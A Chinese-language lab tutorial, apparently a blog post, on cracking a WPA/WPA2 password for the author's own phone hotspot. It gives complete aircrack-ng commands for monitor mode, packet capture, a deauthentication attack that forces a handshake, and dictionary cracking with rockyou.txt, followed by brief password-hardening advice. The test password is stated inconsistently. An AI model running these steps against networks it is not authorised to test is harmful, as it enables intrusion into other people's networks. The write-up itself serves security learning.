概念介绍
WPA/WPA2
WPA(Wi-Fi Protected Access,Wi-Fi 保护访问)和 WPA2 是两种广泛使用的 无线网络安全协议,用于替代早期的 WEP(Wired Equivalent Privacy,有线等效加密),提供更强的安全防护。WPA/WPA2有两种认证方式,个人认证方式(比如手机热点)和企业认证方式(如Radius认证),连接时会进行4次握手,而针对无线密码破解攻击也常常发生在这个握手期间。
aircrack-ng套件
airmon-ng
启用/禁用无线网卡的监控模式(Monitor Mode),使网卡可以捕获所有 Wi-Fi 数据包(包括非目标网络的数据),这一步必须首先执行,否则后续步骤无法操作。在启动无线网卡的监听模式后,无线网络连接将会断开,这是正常现象,只开奖此模式关闭就能恢复。
airodump-ng
扫描并捕获 Wi-Fi 数据包,显示附近的 AP(接入点)和客户端。保存抓取的握手包(.cap
文件),用于后续破解。
aireplay-ng
Deauth 攻击(强制客户端断开并重新连接,以捕获 WPA 握手包)。
aircrack-ng
破解 WPA/WPA2 握手包(.cap
文件),使用 字典攻击 或 暴力破解
rockyou.txt
是kali自带的密码字段,默认路径是/usr/share/wordlists/,解压后的大小134M左右
测试准备
一部荣耀手机HORNOR(开热点)
aircrack-ng 套件
kali自带密码字典文件 rockyou.txt
测试思路
1、手机开启热点,密码设置为 123456789
2、airmon-ng 开启无线网卡的监听模式
3、airodump-ng 扫描并捕获无线数据包
4、aiereplay-ng 强制重连,以获取握手信息
5、aircrack-ng 使用字典破解无线密码
测试步骤
step1、开启无线网络监听模式
airmon-ng start wlan0 #监听无线网络,waln0是无线网卡
注意:执行airmon-ng start wlan0
后无法连接无线网络是正常现象,因为该命令会将网卡切换为监听模式(Monitor Mode),这会禁用常规的无线连接功能。
step2、扫描无线网络
airodump-ng wlan0mon #扫描附近的无线网络,获取到SSID、信道、信号强弱、认证方式等
wlan0mon就是开启无线监听模式后的无线网卡
step3、开启抓包,等待4次握手连接
airodump-ng -c 频道号 --bssid AP的MAC -w 输出文件 wlan0mon
-c:指定信道
--bssid:无线接入点的mac
-w:保存抓包的数据,如test.cap
step4、强制客户端重新连接
aireplay-ng -0 10 -a AP的MAC -c 客户端MAC wlan0mon #强制客户端重新认证,以抓取4次握手包
-0 10 :发送10个deathauth包
-a :目标ap的mac地址
-c :指定目标客户端的mac地址
step5、破解无线密码
以上步骤已经获取到4次握手包,包含了认证密钥信息,接下来就可以使用密码字典进行破解
aircrack-ng xxx.cap #检查cap文件是否包含握手包
aircrack-ng -w 字典文件 捕获的.cap文件 #使用字典破解
-w :指定密码字典文件,rockyou.txt
cap :抓到的以cap后缀的包
接下来就是漫长的等待,如果密码复杂度比较高字典文件又比较大的话,破解过程会非常漫长
本实验用于测试,密码设置比较简单(1234567889),所以破解过程比较快
如上图,KEY FOUND!
安全防御
简单的无线密码,很容易被破解,如果攻击者获取你的密码,就可以连上你的无线网络,再做横向渗透,你的主机信息、业务系统、经常浏览的网站等等信息都能被分析出来。
所以一定要设置复杂的密码,包含数字、字母(大小写)、特殊字符,长度不少于8位,定期更换密码,隐藏SSID等,这些措施都可以提高无线密码安全
其他
暂无